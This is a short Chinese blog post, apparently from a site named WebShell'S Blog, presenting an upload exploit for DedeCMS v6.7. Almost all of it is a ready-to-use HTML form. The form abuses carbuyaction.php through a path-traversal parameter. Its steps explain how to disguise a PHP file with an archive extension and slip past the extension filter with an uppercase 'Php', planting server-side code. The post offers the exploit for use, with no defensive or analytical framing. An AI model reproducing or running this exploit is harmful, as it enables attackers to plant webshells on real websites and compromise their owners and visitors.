织梦cms v6.7最新上传漏洞
EXp:
<form action="http://127.0.0.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br> 1,必须登陆用户。<br> 2,将待上传PHP文件扩展名改为“zip|gz|rar|iso|doc|xsl|ppt|wps”其中之一。<br> 3,newname为上传后的新文件名,扩展名使用大写绕过,如“Php”。<br> </form>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3747.html